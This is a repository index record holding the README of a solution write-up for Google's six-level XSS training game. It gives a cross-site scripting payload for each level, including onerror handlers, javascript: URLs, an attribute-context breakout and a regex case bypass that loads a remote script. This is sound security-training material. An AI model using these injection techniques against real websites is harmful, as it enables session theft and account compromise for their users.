{"id":21983036,"url":"https://github.com/arsho/xss_game","last_synced_at":"2025-03-23T01:30:11.635Z","repository":{"id":79174298,"uuid":"83117067","full_name":"arsho/xss_game","owner":"arsho","description":"Solution of XSS game by Google.","archived":false,"fork":false,"pushed_at":"2018-08-01T03:50:10.000Z","size":37,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-01-28T04:46:11.107Z","etag":null,"topics":["xss","xss-vulnerability"],"latest_commit_sha":null,"homepage":"https://xss-game.appspot.com/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/arsho.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-02-25T08:12:11.000Z","updated_at":"2022-11-13T23:29:05.000Z","dependencies_parsed_at":"2023-05-18T17:30:37.716Z","dependency_job_id":null,"html_url":"https://github.com/arsho/xss_game","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/arsho%2Fxss_game/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/arsho","download_url":"https://codeload.github.com/arsho/xss_game/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245043724,"owners_count":20551833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["xss","xss-vulnerability"],"created_at":"2024-11-29T17:34:14.340Z","updated_at":"2025-03-23T01:30:11.614Z","avatar_url":"https://github.com/arsho.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# XSS-game by Google\n\nGoogle has created a 6-level interactive XSS game.\n[Click here to start playing](https://xss-game.appspot.com/ \"XSS game area\")\n\nIf you can pass all the challenges, you will be rewarded with an appealing cake! \u003cimg class=\"emoji\" title=\":smiley:\" alt=\":smiley:\" src=\"https://assets-cdn.github.com/images/icons/emoji/unicode/1f603.png\" height=\"20\" width=\"20\" align=\"absmiddle\"\u003e\n\n## Level 1: Hello, world of XSS\nIn this level you will learn what happens to an application when it uses user input directly, without proper escaping.\n\n### Solution\n\n```html\n\u003cscript\u003ealert(\"Level1\");\u003c/script\u003e\n```\n\n\n## Level 2: Persistence is key\nSimilar to level 1, but this time directly inserting a `\u003cscript\u003e` tag will not work.\n\n### Solution\n\n```html\n\u003cimg src=\"demo\" onerror='javascript:alert(\"Level2\");' /\u003e\n```\n\n\n## Level 3: That sinking feeling\nThere is no input field in this level, but Cross Site Scripting is still possible via the address path, because the JavaScript code directly uses `self.location.hash.substr(1)`, the part of the URL after the `#` sign.\n\n### Solution\n\nSimply inject the following:\n\n```\nhttps://xss-game.appspot.com/level3/frame#'onerror='alert(\"Level3\")'\n```\n\n\n## Level 4: Context matters\nThe code passes the user value directly into `onload=\"startTimer('{{ timer }}');\"`, so we can exploit the script.\n\n### Solution\n\nEnter the following in the input field.\n\n```\n');javascript:alert('Level4\n```\n\n\n## Level 5: Breaking protocol\nThis is the trickiest challenge. Here several templates are chained together by storing the `next` URL in a variable, so if we can change the value of the `next` variable, XSS will work.\n\n### Solution\n\nWe simply change the URL to:\n\n```\nhttps://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('Level5')\n```\n\nPress GO, which changes the URL of the Next button to `javascript:alert('Level5')`.\n\nFinally press the Next button.\n\n\n## Level 6: Follow the rabbit\nDo you know `regular expressions`? If the answer is `yes`, what do you think the following code snippet will do?\n\n```javascript\nurl.match(/^https?:\\/\\//)\n```\nYeah! You are right. It will match if the `url` variable starts with `http`. But what happens if `url` starts with `HTTP`?\n\nIf you do not know `regex`, start learning at\n[Learn Regular Expressions with simple, interactive exercises](https://regexone.com/ \"RegexOne, Learn Regular Expressions with simple, interactive exercises.\")\n\n### Solution\n\n```\nhttps://xss-game.appspot.com/level6/frame#HTTPS://arsho.github.io/rough/alert.js\n```\n\n\n## Congratulations! Let's eat the cake!!\n\n![alt xss_cake](https://raw.githubusercontent.com/arsho/xss_game/master/screenshot/xss_game_cake.png)\n\n\u003chr\u003e\n\nAuthor: [Ahmedur Rahman Shovon](https://arsho.github.io)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Farsho%2Fxss_game","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Farsho%2Fxss_game","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Farsho%2Fxss_game/lists"}